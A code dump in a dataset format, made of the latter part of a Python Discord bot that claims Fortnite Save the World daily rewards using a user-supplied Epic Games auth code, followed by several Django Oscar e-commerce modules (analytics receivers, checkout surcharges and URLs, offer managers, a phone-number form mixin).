f'{psutil.virtual_memory().total // 1000000}mb\nUsed: '
f'{psutil.virtual_memory().used // 1000000}mb\nFree: '
f'{psutil.virtual_memory().free // 1000000}mb\nUtilisation: '
f'{psutil.virtual_memory().percent}%')
embed.add_field(name='Bot statistics:', value=f'Last update at: {lastmfunction()}')
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
@client.command(name='inf',
aliases=mixedCase('info') + ['infomation', 'stats', 'statistics'],
description='Used to see stats and info about the bot hosting service')
async def info(ctx):
await info_command(ctx)
@slash.slash(name='info',
description='Used to see stats and info about the bot hosting service',
guild_ids=guild_ids)
async def slashinfo(ctx):
await info_command(ctx)
def getReward(day):
day_mod = int(day) % 336
if day_mod == 0:
day_mod = 336
return items.ItemDictonary[str(day_mod)]
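# Rewards repeat on a 336-day cycle: day 337 maps to day 1 (337 % 336 == 1),
# and exact multiples of 336 map back to day 336 via the day_mod == 0 branch.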
async def reward_command(message, day, limit):
global rewards
if day == 'Uhoh-stinky':
        await message.send('Please specify the day (a number) you would like to see.')
elif not day.isnumeric():
        await message.send('Please specify a number only; the argument is the day you want to know about.')
else:
embed = discord.Embed(title=f"Reward info", description=f'For day **{day}**', color=discord.Color(0xff00ff))
embed.add_field(name=f'**Item: **', value=f'{getReward(day)}')
for day1 in items.ItemDictonary:
if 'vBucks' in items.ItemDictonary[day1]:
if int(day) % 336 < int(day1):
if int(day1) - int(day) % 336 == 1:
embed.add_field(name=f'**Next vBuck reward in: **',
value=f'**{int(day1) - int(day) % 336}** day.')
else:
embed.add_field(name=f'**Next vBuck reward in: **',
value=f'**{int(day1) - int(day) % 336}** days.')
break
rewards = ''
if limit < 1:
limit = 7
for day2 in range(1, limit):
rewards += getReward(day2 + int(day))
if not (day2 + 1 == limit):
rewards += ', '
else:
rewards += '.'
if limit == 1:
embed.add_field(name=f'**Tomorrow\'s reward:**', value=f'{getReward(int(day) + 1)}', inline=False)
else:
embed.add_field(name=f'Rewards for the next **{limit}** days:', value=f'{rewards}', inline=False)
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
@client.command(name='rwd',
aliases=mixedCase('reward') + ['dayinfo', 'dailyinfo', 'rwrd', 'RWRD'],
description='View info about a specified days reward')
async def reward(ctx, day='Uhoh-stinky', limit=7):
await reward_command(ctx, day, limit)
@slash.slash(name='reward',
description='View info about a specified days reward',
options=[
create_option(name="day",
description="The day of which you would like to see.",
option_type=4,
required=True),
create_option(name="limit",
description="Amount of rewards to view from set day.",
option_type=4,
required=False),
], guild_ids=guild_ids
)
async def slashreward(ctx, day='Uhoh-stinky', limit=7):
await reward_command(ctx, str(day), limit)
# noinspection PyShadowingBuiltins
@client.command(name='helpfullmao', aliases=mixedCase('help') + ['halp', 'holp', 'how', 'hel', 'h', '?', 'helpp', 'huh'], description='Well, this tells you what commands are available.')
async def help(message):
embed = discord.Embed(title='Help', description='Commands:', colour=discord.Colour.red())
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/757803329027047444/Asset_2.24x.1.png')
embed.set_author(name=message.author.name, icon_url=message.author.avatar_url)
embed.add_field(name='**stw daily** [AUTH TOKEN]',
value="Collect your daily reward\n**Requires: Auth Token**\n[You can get an auth token by following this "
"link](https://tinyurl.com/epicauthcode)\nThen just simply copy your code from the response "
"and append to your command.",
inline=False)
embed.add_field(name='**stw instruction**', value='More detailed instructions for using the bot', inline=False)
embed.add_field(name='**stw reward [day] [future day]**',
value='Sends the friendly name of a reward for the given day.')
embed.add_field(name='**stw ping**',
value='Sends the WebSocket latency and actual latency.')
embed.add_field(name='**stw info**', value='Returns information about the bots host')
embed.add_field(name='Want to quickly see some relevant information?',
value='Have a look at the bot playing status')
embed.add_field(name='**Need an invite?**',
value='**Use **`stw invite`** to get a [server invite](https://discord.gg/MtSgUu) and a [bot invite](https://tinyurl.com/stwdailyinvite).**',
inline=False)
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
async def instruction_command(message, arg):
examples = {'norm': 'stw daily a51c1f4d35b1457c8e34a1f6026faa35',
'slash': '/daily a51c1f4d35b1457c8e34a1f6026faa35'
}
embed = discord.Embed(title='How to use "STW Daily"', color=discord.Color.blurple())
embed.set_footer(text='This bot was made by Dippy is not here', icon_url=message.author.avatar_url)
embed.add_field(name='Welcome',
value='This will show you how to use the bot.\n\n'
'To get started, [Visit this link](https://tinyurl.com/epicauthcode), and copy **only** the '
'authorisation code that it gives you. **(not the code from the URL)**.'
'\nIf you are already signed into Epic Games on your browser, you can just '
'[refresh the final page](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)'
' to get a new code\n\nFor example,\n```js'
'\n{"redirectUrl":"https://accounts.epicgames.com/fnauth?code=a51c1f4d35b14'
'57c8e34a1f6026faa35","sid":null}\n```\nwill become\n```\n'
'a51c1f4d35b1457c8e34a1f6026faa35\n```\n\nThen, just simply copy paste that into '
f'your command, like so:\n``{examples.get(arg)}``\n:bulb: '
'Pro tip: In most browsers, double click on or below the code and it should '
'highlight just the code\n\nIf you need help, [join the server](https://discord.gg/MtSgUu).'
' Don\'t be afraid to ask!',
inline=False)
embed.add_field(name='Important Disclaimers',
value='AFAIK, your auth code can be used maliciously, if you are sceptical,'
' [read the source code](https://github.com/dippyshere/stw-daily), or check out '
'<#771902446737162240> over in [STW Dailies](https://discord.gg/MtSgUu)',
inline=False)
await message.send(embed=embed)
@client.command(name='ins',
aliases=mixedCase('instruction') + ['detailed', 'instruct', 'what', 'inst'],
description='Detailed instructions to get auth token and claim daily')
async def instruction(ctx):
await instruction_command(ctx, 'norm')
@slash.slash(name='Instruction',
description='Detailed instructions to get auth token and claim daily',
guild_ids=guild_ids)
async def slashinstruction(ctx):
await instruction_command(ctx, 'slash')
# noinspection SpellCheckingInspection,PyShadowingNames
async def ping_command(message):
    websocket_ping = '{0}'.format(int(client.latency * 1000)) + ' ms'
before = time.monotonic()
# msg = await message.send("Pong!")
# await msg.edit(content=f"Pong! `{int(ping)}ms`")
# await message.send(f'websocket latency: {client.latency*100}ms')
# await message.send('websocket: {0}'.format(int(client.latency * 100)) + ' ms')
embed = discord.Embed(title='Latency', color=discord.Color.blurple())
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
embed.add_field(name='Websocket :electric_plug:', value=websocket_ping, inline=True)
embed.add_field(name='Actual :microphone:',
value='<a:loadin:759293511475527760>', inline=True)
# embed.add_field(name='Uptime :alarm_clock:', value=f'{get_bot_uptime()}', inline=True)
embed2 = discord.Embed(title='Latency', color=discord.Color.blurple())
embed2.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
embed2.add_field(name='Websocket :electric_plug:', value=websocket_ping, inline=True)
msg = await message.send(embed=embed)
ping = (time.monotonic() - before) * 1000
embed2.add_field(name='Actual :microphone:',
value=f'{int(ping)}ms', inline=True)
await asyncio.sleep(4)
# embed2.add_field(name='Uptime :alarm_clock:', value=f'{get_bot_uptime()}', inline=True)
await msg.edit(embed=embed2)
@client.command(name='pin',
aliases=mixedCase('ping') + ['pong', 'latency'],
description='Send websocket ping and embed edit latency')
async def ping(ctx):
await ping_command(ctx)
@slash.slash(name='ping',
description='Send websocket ping and embed edit latency',
guild_ids=guild_ids)
async def slashping(ctx):
await ctx.defer()
await ping_command(ctx)
async def invite_command(ctx):
await ctx.send('Support server: https://discord.gg/Mt7SgUu\nBot invite: https://tinyurl.com/stwdailyinvite')
@client.command(name='in',
aliases=mixedCase('invite') + ['inv', 'INV', 'iNV', 'add', 'server', 'link'],
description='If you need help, want to report a problem, or just want somewhere to use the bot.')
async def invite(ctx):
await invite_command(ctx)
@slash.slash(name='invite',
description='If you need help, want to report a problem, or just want somewhere to use the bot.',
guild_ids=guild_ids)
async def slashinvite(ctx):
await ctx.send('Support server: https://discord.gg/Mt7SgUu\nBot invite: <https://tinyurl.com/stwdailyinvite>')
# noinspection PyUnboundLocalVariable,PyUnusedLocal,PyBroadException
async def daily_command(message, token=''):
global amount2, rewards
print(f'daily requested by: {message.author.name}')
global daily_feedback, r
daily_feedback = ""
r = ''
if token == "":
embed = discord.Embed(title="No auth code", description='', colour=discord.Color.red())
embed.add_field(name='You can get it from:',
value='[Here if you **ARE NOT** signed into Epic Games on your browser](https://www.epicgames.com/id/logout?redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin%3FredirectUrl%3Dhttps%253A%252F%252Fwww.epicgames.com%252Fid%252Fapi%252Fredirect%253FclientId%253Dec684b8c687f479fadea3cb2ad83f5c6%2526responseType%253Dcode)\n[Here if you **ARE** signed into Epic Games on your browser](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name='Need help? Run ``stw instruction``',
value='Or [Join the support server](https://discord.gg/Mt7SgUu).', inline=True)
embed.add_field(name='Note: You need a new code __every day__.',
value='Thank you for using my bot ❤', inline=True)
embed.set_footer(text=f"Requested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}",
icon_url=message.author.avatar_url)
await message.send(embed=embed)
elif len(token) != 32:
embed = discord.Embed(title="Incorrect formatting", description='', colour=discord.Color.red())
embed.add_field(name='It should be 32 characters long, and only contain numbers and letters',
value='Check if you have any stray quotation marks')
embed.add_field(name='An Example:',
value='a51c1f4d35b1457c8e34a1f6026faa35')
embed.set_footer(text=f"Requested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
else:
embed = discord.Embed(title="Logging in and processing <a:loadin:759293511475527760>",
description='This shouldn\'t take long...', colour=discord.Color.green())
embed.set_footer(text=f"Requested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
msg = await message.send(embed=embed)
gtResult = getToken(token)
if not gtResult[0]:
# print(str(gtResult))
errorType = str(gtResult[1])
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_found':
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code is invalid',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='Your code is expired, or of the wrong type\n(e.g. from url instead of page body)',
inline=False)
embed.add_field(name="How to fix:",
value='[Refresh the page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name="What it should look like:",
value='32 characters of only numbers and letters.\ne.g. a51c1f4d35b1457c8e34a1f6026faa35',
inline=False)
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_for_your_client':
# invalid grant error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code was created with the wrong link',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='You used a different link to get your token',
inline=False)
embed.add_field(name="How to fix:",
value='[Use this page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)\n[Join the support server for further help](https://discord.gg/mt7sguu)',
inline=False)
if len(errorType) == 32:
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='You don\'t have Save the World',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="You need STW for STW Daily rewards",
value='This may appear if you signed into the wrong account. '
'Try to use incognito and [use this page to get a new code](https://tinyurl.com/epicauthcode)',
inline=False)
else:
h = {
"Authorization": f"bearer {gtResult[0]}",
"Content-Type": "application/json"
}
r = requests.post(endpoints.reward.format(gtResult[1]), headers=h, data="{}")
# await msg.edit(embed=discord.Embed(title='Claimed your daily.'))
try:
                # an errorCode in the response means the claim failed
                if str(r.text).find('{"errorCode":"') != -1:
errorType = str(gtResult[1])
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_found':
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code is invalid',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='Your code is expired, or of the wrong type\n(e.g. from url instead of page body)',
inline=False)
embed.add_field(name="How to fix:",
value='[Refresh the page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name="What it should look like:",
value='32 characters of only numbers and letters.\ne.g. a51c1f4d35b1457c8e34a1f6026faa35',
inline=False)
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_for_your_client':
# invalid grant error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code was created with the wrong link',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='You used a different link to get your token',
inline=False)
embed.add_field(name="How to fix:",
value='[Use this page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)\n[Join the support server for further help](https://discord.gg/mt7sguu)',
inline=False)
if len(errorType) == 32:
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='You don\'t have Save the World',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="You need STW for STW Daily rewards",
value='This may appear if you signed into the wrong account. '
'Try to use incognito and [use this page to get a new code](https://tinyurl.com/epicauthcode)',
inline=False)
else:
try:
# print(str(str(r.text).split("notifications", 1)[1][2:].split('],"profile', 1)[0]))
daily_feedback = str(r.text).split("notifications", 1)[1][4:].split('],"profile', 1)[0]
day = str(daily_feedback).split('"daysLoggedIn":', 1)[1].split(',"items":[', 1)[0]
try:
# await message.send(f'Debugging info because sometimes it breaks:\n{daily_feedback}')
item = str(daily_feedback).split('[{"itemType":"', 1)[1].split('","itemGuid"', 1)[0]
amount = str(daily_feedback).split('"quantity":', 1)[1].split("}]}", 1)[0]
embed = discord.Embed(title='Success',
colour=0x00c113)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/757803334198624336/Asset_2.1.14x2.png')
if "}" in amount:
amount2 = str(amount).split("},", 1)[0]
fndr_item = str(amount).split('itemType":"', 1)[1].split('","', 1)[0]
fndr_amount = str(amount).split('quantity":', 1)[1]
if fndr_item == 'CardPack:cardpack_event_founders':
fndr_item_f = "Founder's Llama"
elif fndr_item == 'CardPack:cardpack_bronze':
fndr_item_f = "Upgrade Llama (bronze)"
else:
fndr_item_f = fndr_item
embed.add_field(name=f'On day **{day}**, you received:', value=f"**{getReward(day)}**",
inline=False)
embed.add_field(name=f'Founders rewards:', value=f"**{fndr_amount}** **{fndr_item_f}**",
inline=False)
else:
embed.add_field(name=f'On day **{day}**, you received:', value=f"**{getReward(day)}**",
inline=False)
print('success')
print(item)
print(amount)
rewards = ''
                            for i in range(1, 8):
                                rewards += getReward(int(day) + i)
                                if i != 7:
                                    rewards += ', '
                                else:
                                    rewards += '.'
embed.add_field(name=f'Rewards for the next **7** days:', value=f'{rewards}', inline=False)
except Exception as e:
# await message.send(f'Debugging info because sometimes it breaks:\n{e}')
embed = discord.Embed(title=errorList[random.randint(0, 4)],
colour=0xeeaf00)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/757803329299415163/Asset_1.14x2.png')
embed.add_field(name='You already claimed today\'s reward.',
value=f"You are on day **{day}**", inline=False)
embed.add_field(name='Today\'s reward was:',
value=f"{getReward(day)}", inline=False)
print('Daily was already claimed or i screwed up')
print(f'Error info: {e}')
except:
errorType = str(gtResult[1])
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_found':
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code is invalid',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='Your code is expired, or of the wrong type\n(e.g. from url instead of page body)',
inline=False)
embed.add_field(name="How to fix:",
value='[Refresh the page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name="What it should look like:",
value='32 characters of only numbers and letters.\ne.g. a51c1f4d35b1457c8e34a1f6026faa35',
inline=False)
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_for_your_client':
# invalid grant error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code was created with the wrong link',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='You used a different link to get your token',
inline=False)
embed.add_field(name="How to fix:",
value='[Use this page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)\n[Join the support server for further help](https://discord.gg/mt7sguu)',
inline=False)
if len(errorType) == 32:
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='You don\'t have Save the World',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="You need STW for STW Daily rewards",
value='This may appear if you signed into the wrong account. '
'Try to use incognito and [use this page to get a new code](https://tinyurl.com/epicauthcode)',
inline=False)
print(f'error: {gtResult[1]}')
except:
pass
# embed.set_author(name=str(message.message.content)[9:],
# icon_url='https://upload.wikimedia.org/wikipedia/commons/thumb/3/31'
# '/Epic_Games_logo.svg/1200px-Epic_Games_logo.svg.png')
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
# await message.send(embed=embed)
await asyncio.sleep(0.5)
await msg.edit(embed=embed)
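# --- Editor's sketch (hedged; never called by the bot) ---------------------
# The string splitting in daily_command assumes a response layout with a
# "notifications" list holding "daysLoggedIn" and "items"; under that same
# assumption the data could be read structurally instead:
def _parse_daily_notification(response_json):
    """Return (daysLoggedIn, items) from the first notification, or None."""
    try:
        note = response_json['notifications'][0]
        return note['daysLoggedIn'], note['items']
    except (KeyError, IndexError, TypeError):
        return None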
@client.command(name='d',
aliases=mixedCase('daily') + ['collect', 'dailt', 'daliy', 'dail', 'daiyl', 'day', 'dialy', 'da', 'dly', 'login', 'claim'],
description='Claim your daily reward')
async def daily(ctx, token=''):
await daily_command(ctx, token)
@slash.slash(name='daily',
description='Claim your daily reward',
options=[
create_option(name="token",
description="The auth code for your daily. "
"You can one by sending the command without token.",
option_type=3,
required=False),
], guild_ids=guild_ids
)
async def slashdaily(ctx, token=''):
await daily_command(ctx, token)
# noinspection SpellCheckingInspection
client.loop.create_task(update_status())
client.run('token')
```
|
{
"source": "Jean1508/ya-madoa",
"score": 2
}
|
#### File: apps/analytics/receivers.py
```python
import logging
from django.db import IntegrityError
from django.db.models import F
from django.dispatch import receiver
from oscar.apps.basket.signals import basket_addition
from oscar.apps.catalogue.signals import product_viewed
from oscar.apps.order.signals import order_placed
from oscar.apps.search.signals import user_search
from oscar.core.loading import get_model
ProductRecord = get_model('analytics', 'ProductRecord')
UserProductView = get_model('analytics', 'UserProductView')
UserRecord = get_model('analytics', 'UserRecord')
UserSearch = get_model('analytics', 'UserSearch')
# Helpers
logger = logging.getLogger('oscar.analytics')
def _update_counter(model, field_name, filter_kwargs, increment=1):
"""
Efficiently updates a counter field by a given increment. Uses Django's
update() call to fetch and update in one query.
TODO: This has a race condition, we should use UPSERT here
:param model: The model class of the recording model
:param field_name: The name of the field to update
:param filter_kwargs: Parameters to the ORM's filter() function to get the
correct instance
"""
try:
record = model.objects.filter(**filter_kwargs)
affected = record.update(**{field_name: F(field_name) + increment})
if not affected:
filter_kwargs[field_name] = increment
model.objects.create(**filter_kwargs)
except IntegrityError: # pragma: no cover
        # get_or_create has a race condition (we should use upsert in
        # supported databases). For now just ignore these errors.
logger.error(
"IntegrityError when updating analytics counter for %s", model)
def _record_products_in_order(order):
# surely there's a way to do this without causing a query for each line?
for line in order.lines.all():
_update_counter(
ProductRecord, 'num_purchases',
{'product': line.product}, line.quantity)
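# (Editor note, hedged) The per-line product lookup above could be batched
# with select_related, e.g. `for line in order.lines.select_related('product'):`;
# the counter update itself still costs one statement per line.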
def _record_user_order(user, order):
try:
record = UserRecord.objects.filter(user=user)
affected = record.update(
num_orders=F('num_orders') + 1,
num_order_lines=F('num_order_lines') + order.num_lines,
num_order_items=F('num_order_items') + order.num_items,
total_spent=F('total_spent') + order.total_incl_tax,
date_last_order=order.date_placed)
if not affected:
UserRecord.objects.create(
user=user, num_orders=1, num_order_lines=order.num_lines,
num_order_items=order.num_items,
total_spent=order.total_incl_tax,
date_last_order=order.date_placed)
except IntegrityError: # pragma: no cover
logger.error(
"IntegrityError in analytics when recording a user order.")
# Receivers
@receiver(product_viewed)
def receive_product_view(sender, product, user, **kwargs):
if kwargs.get('raw', False):
return
_update_counter(ProductRecord, 'num_views', {'product': product})
if user and user.is_authenticated:
_update_counter(UserRecord, 'num_product_views', {'user': user})
UserProductView.objects.create(product=product, user=user)
@receiver(user_search)
def receive_product_search(sender, query, user, **kwargs):
if user and user.is_authenticated and not kwargs.get('raw', False):
UserSearch._default_manager.create(user=user, query=query)
@receiver(basket_addition)
def receive_basket_addition(sender, product, user, **kwargs):
if kwargs.get('raw', False):
return
_update_counter(
ProductRecord, 'num_basket_additions', {'product': product})
if user and user.is_authenticated:
_update_counter(UserRecord, 'num_basket_additions', {'user': user})
@receiver(order_placed)
def receive_order_placed(sender, order, user, **kwargs):
if kwargs.get('raw', False):
return
_record_products_in_order(order)
if user and user.is_authenticated:
_record_user_order(user, order)
```
#### File: apps/checkout/applicator.py
```python
class SurchargeList(list):
@property
def total(self):
return sum([surcharge.price for surcharge in self])
class SurchargePrice():
surcharge = None
price = None
def __init__(self, surcharge, price):
self.surcharge = surcharge
self.price = price
class SurchargeApplicator():
def __init__(self, request=None, context=None):
self.context = context
self.request = request
def get_surcharges(self, basket, **kwargs):
"""
For example::
return (
PercentageCharge(percentage=D("2.00")),
FlatCharge(excl_tax=D("20.0"), incl_tax=D("20.0")),
)
Surcharges must implement the minimal API in ``oscar.apps.checkout.surcharges.BaseSurcharge``.
Note that you can also make it a model if you want, just like shipping methods.
"""
return ()
def get_applicable_surcharges(self, basket, **kwargs):
methods = [
SurchargePrice(
surcharge,
surcharge.calculate(basket=basket, **kwargs)
)
for surcharge in self.get_surcharges(basket=basket, **kwargs)
if self.is_applicable(surcharge=surcharge, basket=basket, **kwargs)
]
if methods:
return SurchargeList(methods)
else:
return None
def is_applicable(self, surcharge, basket, **kwargs):
"""
Checks if surcharge is applicable to certain conditions
"""
return True
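# --- Editor's sketch (hedged): a concrete applicator following the docstring
# example above.  `FlatCharge` is assumed to live in
# oscar.apps.checkout.surcharges, as the docstring implies; verify the import
# path for your Oscar version before use.
#
# from decimal import Decimal as D
# from oscar.apps.checkout.surcharges import FlatCharge
#
# class HandlingFeeApplicator(SurchargeApplicator):
#     def get_surcharges(self, basket, **kwargs):
#         return (FlatCharge(excl_tax=D("2.00"), incl_tax=D("2.42")),)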
```
#### File: apps/checkout/apps.py
```python
from django.conf import settings
from django.conf.urls import url
from django.contrib.auth.decorators import login_required
from django.utils.translation import gettext_lazy as _
from oscar.core.application import OscarConfig
from oscar.core.loading import get_class
class CheckoutConfig(OscarConfig):
label = 'checkout'
name = 'oscar.apps.checkout'
verbose_name = _('Checkout')
namespace = 'checkout'
def ready(self):
self.index_view = get_class('checkout.views', 'IndexView')
self.shipping_address_view = get_class('checkout.views', 'ShippingAddressView')
self.user_address_update_view = get_class('checkout.views',
'UserAddressUpdateView')
self.user_address_delete_view = get_class('checkout.views',
'UserAddressDeleteView')
self.shipping_method_view = get_class('checkout.views', 'ShippingMethodView')
self.payment_method_view = get_class('checkout.views', 'PaymentMethodView')
self.payment_details_view = get_class('checkout.views', 'PaymentDetailsView')
self.thankyou_view = get_class('checkout.views', 'ThankYouView')
def get_urls(self):
urls = [
url(r'^$', self.index_view.as_view(), name='index'),
# Shipping/user address views
url(r'shipping-address/$',
self.shipping_address_view.as_view(), name='shipping-address'),
url(r'user-address/edit/(?P<pk>\d+)/$',
self.user_address_update_view.as_view(),
name='user-address-update'),
url(r'user-address/delete/(?P<pk>\d+)/$',
self.user_address_delete_view.as_view(),
name='user-address-delete'),
# Shipping method views
url(r'shipping-method/$',
self.shipping_method_view.as_view(), name='shipping-method'),
# Payment views
url(r'payment-method/$',
self.payment_method_view.as_view(), name='payment-method'),
url(r'payment-details/$',
self.payment_details_view.as_view(), name='payment-details'),
# Preview and thankyou
url(r'preview/$',
self.payment_details_view.as_view(preview=True),
name='preview'),
url(r'thank-you/$', self.thankyou_view.as_view(),
name='thank-you'),
]
return self.post_process_urls(urls)
def get_url_decorator(self, pattern):
if not settings.OSCAR_ALLOW_ANON_CHECKOUT:
return login_required
if pattern.name.startswith('user-address'):
return login_required
return None
```
#### File: apps/offer/managers.py
```python
from django.db import models
from django.utils.timezone import now
from .queryset import RangeQuerySet
class ActiveOfferManager(models.Manager):
"""
For searching/creating offers within their date range
"""
def get_queryset(self):
cutoff = now()
return super().get_queryset().filter(
models.Q(end_datetime__gte=cutoff) | models.Q(end_datetime=None),
models.Q(start_datetime__lte=cutoff) | models.Q(start_datetime=None),
).filter(status=self.model.OPEN)
RangeManager = models.Manager.from_queryset(RangeQuerySet, "RangeManager")
class BrowsableRangeManager(RangeManager):
"""
For searching only ranges which have the "is_public" flag set to True.
"""
def get_queryset(self):
return super().get_queryset().filter(
is_public=True)
```
#### File: oscar/forms/mixins.py
```python
import phonenumbers
from django import forms
from django.core import validators
from django.utils.translation import gettext_lazy as _
from phonenumber_field.phonenumber import PhoneNumber
class PhoneNumberMixin(object):
"""Validation mixin for forms with a phone numbers, and optionally a country.
It tries to validate the phone numbers, and on failure tries to validate
them using a hint (the country provided), and treating it as a local number.
Specify which fields to treat as phone numbers by specifying them in
`phone_number_fields`, a dictionary of fields names and default kwargs
for instantiation of the field.
"""
country = None
region_code = None
# Since this mixin will be used with `ModelForms`, names of phone number
# fields should match names of the related Model field
phone_number_fields = {
'phone_number': {
'required': False,
'help_text': '',
'max_length': 32,
'label': _('Phone number')
},
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
        # We can't use the PhoneNumberField here since we want to validate
        # the phonenumber based on the selected country as a fallback when a
        # local number is entered. We add the fields in the init since on
        # Python 2 using forms.Form as base class results in errors when
        # using this class as mixin.
# If the model field already exists, copy existing properties from it
for field_name, field_kwargs in self.phone_number_fields.items():
for key in field_kwargs:
try:
field_kwargs[key] = getattr(self.fields[field_name], key)
except (KeyError, AttributeError):
pass
self.fields[field_name] = forms.CharField(**field_kwargs)
def get_country(self):
# If the form data contains valid country information, we use that.
if hasattr(self, 'cleaned_data') and 'country' in self.cleaned_data:
return self.cleaned_data['country']
# Oscar hides the field if there's only one country. Then (and only
# then!) we can consider a country on the model instance.
elif 'country' not in self.fields and hasattr(self.instance, 'country'):
return self.instance.country
def set_country_and_region_code(self):
# Try hinting with the shipping country if we can determine one.
self.country = self.get_country()
if self.country:
self.region_code = self.country.iso_3166_1_a2
def clean_phone_number_field(self, field_name):
number = self.cleaned_data.get(field_name)
# Empty
if number in validators.EMPTY_VALUES:
return ''
# Check for an international phone format
try:
phone_number = PhoneNumber.from_string(number)
except phonenumbers.NumberParseException:
if not self.region_code:
# There is no shipping country, not a valid international number
self.add_error(
field_name,
_('This is not a valid international phone format.'))
return number
# The PhoneNumber class does not allow specifying
# the region. So we drop down to the underlying phonenumbers
# library, which luckily allows parsing into a PhoneNumber
# instance.
try:
phone_number = PhoneNumber.from_string(number,
region=self.region_code)
if not phone_number.is_valid():
self.add_error(
field_name,
_('This is not a valid local phone format for %s.')
% self.country)
except phonenumbers.NumberParseException:
# Not a valid local or international phone number
self.add_error(
field_name,
_('This is not a valid local or international phone format.'))
return number
return phone_number
def clean(self):
self.set_country_and_region_code()
cleaned_data = super().clean()
for field_name in self.phone_number_fields:
cleaned_data[field_name] = self.clean_phone_number_field(field_name)
return cleaned_data
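# --- Editor's sketch (hedged): declaring an extra phone field through the
# `phone_number_fields` hook described in the class docstring.  `ContactForm`
# and `fax_number` are hypothetical names.
#
# class ContactForm(PhoneNumberMixin, forms.Form):
#     phone_number_fields = {
#         'phone_number': {'required': False, 'help_text': '',
#                          'max_length': 32, 'label': _('Phone number')},
#         'fax_number': {'required': False, 'help_text': '',
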